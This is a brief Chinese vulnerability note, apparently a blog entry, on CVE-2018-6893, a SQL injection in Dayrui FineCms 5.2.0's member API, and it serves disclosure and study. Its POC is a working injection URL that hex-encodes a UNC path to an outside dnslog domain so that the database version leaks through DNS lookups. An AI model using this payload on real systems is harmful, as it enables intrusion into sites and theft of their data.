【初级】finecms SQL注入

CVE-2018-6893

漏洞描述:Dayrui FineCms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。

影响版本:Dayrui FineCms 5.2.0

参考资料:https://xz.aliyun.com/t/2050

POC:

http://localhost/index.php?s=member&c=api&m=checktitle&id=13&title=123&module=news,(select load_file(concat(0x5c5c5c5c,version(),0x2e7178383570782e646e736c6f672e636e616263)))) as total
© 版权声明
THE END
喜欢就支持一下吧
点赞10赏点小钱 分享